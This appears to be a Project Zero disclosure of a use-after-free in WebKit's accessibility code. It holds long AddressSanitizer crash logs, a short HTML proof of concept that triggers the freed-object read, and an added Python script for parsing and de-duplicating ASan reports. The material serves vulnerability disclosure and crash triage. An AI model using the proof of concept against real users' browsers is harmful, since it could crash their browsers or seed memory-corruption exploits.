#11 0x10ba14ab8 in WebCore::AXObjectCache::handleAriaExpandedChange(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e1ab8)
#12 0x10c14c041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)
#13 0x10c152268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)
#14 0x10c15207c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)
#15 0x10c14b8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)
#16 0x10c14b6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)
#17 0x10cd8fb93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)
#18 0x10cd815d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)
#19 0x10cd81441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)
#20 0x235a91e01027 (<unknown module>)
#21 0x10859434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#22 0x10859434a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#23 0x10858d91a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)
#24 0x1081f2757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)
#25 0x1081743da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)
#26 0x1077ac0f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)
#27 0x1077ac362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)
#28 0x1077ac6d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)
#29 0x10ca26a15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5fab8) in WebCore::AccessibilityRenderObject::handleAriaExpandedChanged()
Shadow bytes around the buggy address:
0x1c10000154a0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c10000154b0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x1c10000154c0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x1c10000154d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c10000154e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
=>0x1c10000154f0: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fa
0x1c1000015500: fa fa fa fa 00 00 00 fc fc 00 00 00 00 00 00 00
0x1c1000015510: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x1c1000015520: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000015530: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1000015540: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==29817==ABORTING
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1249
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on an ASan build of WebKit nightly.
Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.
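The free and allocation stacks in the log below carry the whole story: the AccessibilityObject is created in AccessibilityRenderObject::create, freed from AXObjectCache::remove while RenderObject::willBeDestroyed runs inside the Document::updateLayout that TextIterator forces (the hidden li's renderer is torn down), and then read again in AccessibilityNodeObject::textUnderElement higher up in the very same call chain. Pulling those three facts out of a multi-hundred-line ASan report by hand is tedious when triaging a batch of crashes, so the following Python script is added here as a worked example; it is not part of the Project Zero report or of WebKit. It parses the ERROR header, the access line, the region line and the three stacks, skips allocator and sanitizer frames to find the code that actually owned the object, and derives a de-duplication signature. The embedded report is a constructed, trimmed copy of the log below with module paths shortened to /path/... so the block runs offline; it needs only the Python standard library (3.8 or later).

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample (not a real log): a trimmed copy of the report below,
# with module paths shortened to /path/... so the block stays self-contained.
SAMPLE_REPORT = """\
==728==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000908a0 at pc 0x000109f2cbb5 bp 0x7fff5e08a430 sp 0x7fff5e08a428
READ of size 8 at 0x6080000908a0 thread T0
==728==WARNING: invalid path to external symbolizer!
#0 0x109f2cbb4 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/path/WebCore:x86_64+0x25bb4)
#1 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/path/WebCore:x86_64+0x51273)
#2 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/path/WebCore:x86_64+0x236e0)
#3 0x279e6e001027 (<unknown module>)
0x6080000908a0 is located 0 bytes inside of 88-byte region [0x6080000908a0,0x6080000908f8)
freed by thread T0 here:
#0 0x104b54294 in __sanitizer_mz_free (/path/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x1164fcf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/path/JavaScriptCore:x86_64+0x1c4af30)
#2 0x10a0e1fda in WebCore::AXObjectCache::remove(unsigned int) (/path/WebCore:x86_64+0x1dafda)
previously allocated by thread T0 here:
#0 0x104b53d2c in __sanitizer_mz_malloc (/path/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffa3314281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x116490768 in WTF::fastMalloc(unsigned long) (/path/JavaScriptCore:x86_64+0x1bde768)
#3 0x109f09a08 in WTF::RefCounted<WebCore::AccessibilityObject>::operator new(unsigned long) (/path/WebCore:x86_64+0x2a08)
#4 0x109f55ef9 in WebCore::AccessibilityRenderObject::create(WebCore::RenderObject*) (/path/WebCore:x86_64+0x4eef9)
SUMMARY: AddressSanitizer: heap-use-after-free (/path/WebCore:x86_64+0x5fab8) in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const
"""

HEADER_RE = re.compile(r"^==\d+==ERROR: AddressSanitizer: ([\w-]+) on (?:unknown )?address (0x[0-9a-f]+)")
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+) at 0x[0-9a-f]+ thread (T\d+)")
REGION_RE = re.compile(r"is located (\d+) bytes (inside of|to the right of|to the left of) (\d+)-byte region")
# "#N 0xADDR in symbol (module+offset)"; the "in symbol" part is absent for JIT frames.
FRAME_RE = re.compile(r"^#(\d+) 0x[0-9a-f]+(?: in (.+))? \(([^()]+)\)$")
# Frames owned by the allocator or the sanitizer rather than by the code under test.
ALLOCATOR_PREFIXES = ("__sanitizer_", "__asan_", "__interceptor_", "malloc", "calloc", "realloc",
                      "free", "bmalloc::", "WTF::fastMalloc", "WTF::fastFree")


@dataclass
class Frame:
    index: int
    func: str    # symbol as printed; "" when ASan could not symbolize the frame
    module: str

    @property
    def short(self) -> str:
        # Drop the parameter list so one function maps to one string regardless of overload.
        return self.func.split("(", 1)[0].strip()

    def is_allocator(self) -> bool:
        return (not self.func or self.func.startswith(ALLOCATOR_PREFIXES)
                or "::operator new" in self.func or "::operator delete" in self.func)


@dataclass
class AsanReport:
    kind: str
    address: int
    op: Optional[str] = None
    size: Optional[int] = None
    thread: Optional[str] = None
    region_offset: Optional[int] = None
    region_relation: Optional[str] = None
    region_size: Optional[int] = None
    use_stack: List[Frame] = field(default_factory=list)
    free_stack: List[Frame] = field(default_factory=list)
    alloc_stack: List[Frame] = field(default_factory=list)


def parse_asan_report(text: str) -> AsanReport:
    """Parse one ASan report; text before the ERROR header and after SUMMARY is ignored."""
    report: Optional[AsanReport] = None
    current: Optional[List[Frame]] = None  # stack that frame lines currently belong to
    for line in (ln.strip() for ln in text.splitlines()):
        if m := HEADER_RE.match(line):
            report = AsanReport(kind=m.group(1), address=int(m.group(2), 16))
            current = report.use_stack
        elif report is None:
            continue
        elif line.startswith("SUMMARY:"):
            break
        elif m := ACCESS_RE.match(line):
            report.op, report.size, report.thread = m.group(1), int(m.group(2)), m.group(3)
        elif m := REGION_RE.search(line):
            report.region_offset, report.region_relation = int(m.group(1)), m.group(2)
            report.region_size = int(m.group(3))
            current = None  # frames resume only after the next "freed by"/"allocated by" heading
        elif line.startswith("freed by thread"):
            current = report.free_stack
        elif line.startswith("previously allocated by thread"):
            current = report.alloc_stack
        elif (m := FRAME_RE.match(line)) and current is not None:
            current.append(Frame(int(m.group(1)), (m.group(2) or "").strip(), m.group(3)))
    if report is None:
        raise ValueError("no AddressSanitizer ERROR header found")
    return report


def first_project_frame(stack: List[Frame]) -> Optional[Frame]:
    """First non-allocator frame: for the free/alloc stacks, the code that owned the object."""
    return next((f for f in stack if not f.is_allocator()), None)


def signature(report: AsanReport, depth: int = 3) -> str:
    """De-duplication key: bug kind plus the top non-allocator frames of the faulting stack."""
    frames = [f.short for f in report.use_stack if not f.is_allocator()][:depth]
    return "|".join([report.kind] + frames)
```

Run it over a saved report with parse_asan_report(open(path).read()); signature() groups reports whose symbolized frames differ only in load addresses and build offsets, which is what you want when the same bug is reached from several PoCs, and first_project_frame() on the free and allocation stacks names the owning code (here AXObjectCache::remove and AccessibilityRenderObject::create) without scrolling past the allocator plumbing.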
PoC:
=================================================================
-->
<script>
function go() {
li.hidden = true;
dir.setAttribute("aria-labeledby", "map");
}
</script>
<body onload=go()>
<dir id="dir">
<li id="li">
<map id="map">
<area></area>
<!--
=================================================================
ASan log:
=================================================================
==728==ERROR: AddressSanitizer: heap-use-after-free on address 0x6080000908a0 at pc 0x000109f2cbb5 bp 0x7fff5e08a430 sp 0x7fff5e08a428
READ of size 8 at 0x6080000908a0 thread T0
==728==WARNING: invalid path to external symbolizer!
==728==WARNING: Failed to use and restart external symbolizer!
#0 0x109f2cbb4 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4)
#1 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)
#2 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)
#3 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)
#4 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)
#5 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)
#6 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)
#7 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)
#8 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)
#9 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)
#10 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)
#11 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)
#12 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)
#13 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)
#14 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)
#15 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)
#16 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)
#17 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)
#18 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)
#19 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)
#20 0x279e6e001027 (<unknown module>)
#21 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#22 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#23 0x115e2291a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)
#24 0x115a87757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)
#25 0x115a093da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)
#26 0x1150410f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)
#27 0x115041362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)
#28 0x1150416d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)
#29 0x10b0faa15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)
#30 0x10b48e510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)
#31 0x10a88f68e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e)
#32 0x10a88f170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170)
#33 0x10a76a041 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x863041)
#34 0x10a779aaf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x872aaf)
#35 0x10a67b7af in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7747af)
#36 0x10a676103 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f103)
#37 0x10aa1b9ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)
#38 0x10aa18d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)
#39 0x10a694493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)
#40 0x10ac085c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)
#41 0x10a733093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)
#42 0x10a6f2386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
#43 0x10a181997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
#44 0x10a17b2aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
#45 0x10cb02c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
#46 0x10260c2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
#47 0x10260f689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
#48 0x10260eba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
#49 0x101eaf683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
#50 0x101c593b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
#51 0x101c62888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)
#52 0x1164b5312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)
#53 0x1164b5d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)
#54 0x7fff8da4f3c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)
#55 0x7fff8da302cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)
#56 0x7fff8da2f7c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)
#57 0x7fff8da2f1c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)
#58 0x7fff8cf90ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#59 0x7fff8cf90cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#60 0x7fff8cf90b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#61 0x7fff8b52be23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)
#62 0x7fff8bca785d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)
#63 0x7fff8b5207aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)
#64 0x7fff8b4eb1dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)
#65 0x7fffa33eb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#66 0x7fffa33ea2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#67 0x101b7156c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#68 0x7fffa3192234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x6080000908a0 is located 0 bytes inside of 88-byte region [0x6080000908a0,0x6080000908f8)
freed by thread T0 here:
#0 0x104b54294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x1164fcf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)
#2 0x10a0e1fda in WebCore::AXObjectCache::remove(unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dafda)
#3 0x10a0e576e in WebCore::AXObjectCache::remove(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1de76e)
#4 0x10c573c0b in WebCore::RenderObject::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266cc0b)
